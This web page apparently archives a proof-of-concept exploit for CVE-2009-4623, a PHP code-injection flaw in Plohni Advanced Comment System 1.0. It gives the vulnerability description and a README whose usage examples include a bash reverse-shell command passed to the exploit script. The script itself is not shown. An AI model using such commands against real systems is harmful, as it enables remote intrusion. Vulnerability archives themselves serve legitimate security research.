Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2009-4623 PoC — Plohni Advanced Comment System 代码注入漏洞

Source
Associated Vulnerability
Title:Plohni Advanced Comment System 代码注入漏洞 (CVE-2009-4623)
Description:Plohni Advanced Comment System是Plohni个人开发者的一套评论系统。 Plohni Advanced Comment System 1.0 存在代码注入漏洞,该漏洞允许远程攻击者可利用该漏洞通过advanced_comment_system/的index.php and admin.php ACS_path参数执行任意PHP代码。
Description
Advanced Comment System 1.0 - Remote Command Execution (RCE) 
Readme
# Advanced Comment System 1.0 - Remote Command Execution (RCE)
> https://nvd.nist.gov/vuln/detail/CVE-2009-4623

## Examples
```bash
python3 exploit.py http://127.0.0.1 uname -a
```

```bash
python3 exploit.py http://127.0.0.1 'bash -i >& /dev/tcp/127.0.0.1/443 0>&1'
```
File Snapshot

[4.0K] /data/pocs/00c86148bee7c284c5f118c17fb46ac14099b0cb ├── [1.7K] exploit.py ├── [1.0K] LICENSE └── [ 272] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.